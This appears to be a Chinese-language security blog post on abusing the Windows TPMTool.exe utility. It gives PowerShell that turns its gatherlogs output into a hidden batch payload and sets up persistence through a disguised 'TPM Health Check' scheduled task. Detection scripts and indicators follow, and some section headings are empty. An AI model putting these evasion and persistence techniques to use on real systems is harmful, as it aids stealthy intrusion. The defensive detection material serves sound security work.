TPMTool.exe是Windows內建的可信平台模組管理工具。
攻擊者可以利用他的創建目錄結構和白名單信任的特性,把它作為攻擊鏈的關鍵元件。
今天我們就一起來看看這個工具的使用方法吧。
關鍵功能:tpmtool gatherlogs [path]
會在指定路徑創建多個.txt和.xml檔案
濫用價值:
$d = "$env:TEMP\TPMDiag"
mkdir $d -Force | Out-Null
tpmtool gatherlogs $d 2>$null
$tpmFiles = gci $d -Filter *.txt
if($tpmFiles){
$target = $tpmFiles[0].FullName
@'
@echo off
start calc.exe
start notepad.exe
echo TPM Module Loaded > %TEMP%\tpm_status.txt
'@ | Out-File $target -Force -Encoding ASCII
Rename-Item $target "$d\TPMInit.bat" -Force
Start-Process "$d\TPMInit.bat" -WindowStyle Hidden
Start-Sleep 2
if(Get-Process calc -EA 0){Write-Host "Payload executed via TPM file" -F Green}
}
Stop-Process -Name calc,notepad -Force -EA 0
Remove-Item $d -Recurse -Force -EA 0
幾個比較重要的點:
$persistDir = "$env:LOCALAPPDATA\Microsoft\TPM"
mkdir $persistDir -Force | Out-Null
$triggerScript = @'
tpmtool gatherlogs C:\Windows\Temp\TPMCache
if exist C:\Windows\Temp\TPMCache\*.txt (
powershell -NoP -W Hidden -C "Start-Process calc.exe"
rmdir /s /q C:\Windows\Temp\TPMCache
)
'@
$triggerScript | Out-File "$persistDir\TPMSchedule.bat" -Encoding ASCII
schtasks /create /tn "TPM Health Check" /tr "$persistDir\TPMSchedule.bat" /sc hourly /f 2>$null
if($?){Write-Host "Persistence installed using TPMTool trigger" -F Green}
schtasks /run /tn "TPM Health Check" 2>$null
Start-Sleep 3
if(Get-Process calc -EA 0){
Write-Host "TPMTool trigger successful" -F Green
Stop-Process -Name calc -Force
}
schtasks /delete /tn "TPM Health Check" /f 2>$null
Remove-Item $persistDir -Recurse -Force -EA 0
幾個比較重要的點:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
? {$_.Message -match 'tpmtool.*gatherlogs' -and $_.TimeCreated -gt (Get-Date).AddHours(-1)} |
% {
$time = $_.TimeCreated
$followUp = Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
? {$_.TimeCreated -gt $time -and $_.TimeCreated -lt $time.AddMinutes(5)}
if($followUp | ? {$_.Message -match 'cmd|powershell|wscript'}){
Write-Host "ALERT: TPMTool followed by script execution at $time" -F Red
}
}
$fsw = New-Object System.IO.FileSystemWatcher
$fsw.Path = $env:TEMP
$fsw.Filter = "TPM*"
$fsw.IncludeSubdirectories = $true
$fsw.EnableRaisingEvents = $true
Register-ObjectEvent -InputObject $fsw -EventName Created -Action {
$path = $Event.SourceEventArgs.FullPath
$files = gci $path -Recurse -Include *.bat,*.ps1,*.exe -EA 0
if($files){
Write-Host "SUSPICIOUS: Executable in TPM directory: $files" -F Red
}
}
# 只允許從特定路徑執行
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths" `
-Name "{GUID}" -Value "C:\Windows\System32\tpmtool.exe" -PropertyType String
# 監控異常執行位置
Get-Process | ? {$_.Name -eq 'tpmtool' -and $_.Path -notlike "*System32*"}
正常的tpmtool使用:
異常的tpmtool使用:
檔案特徵:
%TEMP%\TPM*\*.txt
被修改為非文字內容進程鏈:
powershell.exe → tpmtool.exe → cmd.exe
tpmtool.exe → [修改檔案] → wscript.exe
時序特徵:
TPMTool 之所以強大是因為: